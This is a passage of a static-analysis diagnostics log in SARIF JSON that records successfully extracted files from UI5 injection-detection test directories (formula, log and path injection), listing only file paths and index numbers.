"uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - 
}, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 168 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 169 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - 
"formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 170 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 173 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", 
- "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 174 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 176 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 177 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - 
"descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 178 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 181 - } - } - } ], - "message" : { - "text" : "" - }, 
- "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 182 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 183 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - 
"index" : 185 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 186 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 187 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 190 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 191 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - 
"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 194 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 195 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 196 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - 
"locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 198 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 199 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", - "uriBaseId" : "%SRCROOT%", - "index" : 200 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : 
{ - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 201 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 203 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - 
"properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 205 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 207 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 208 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - 
} - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 211 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 212 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - 
"toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 213 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 215 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - 
"descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 217 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 218 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 
220 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 221 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", - 
"uriBaseId" : "%SRCROOT%", - "index" : 224 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 225 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 226 - } - } - } ], - "message" : { - "text" : 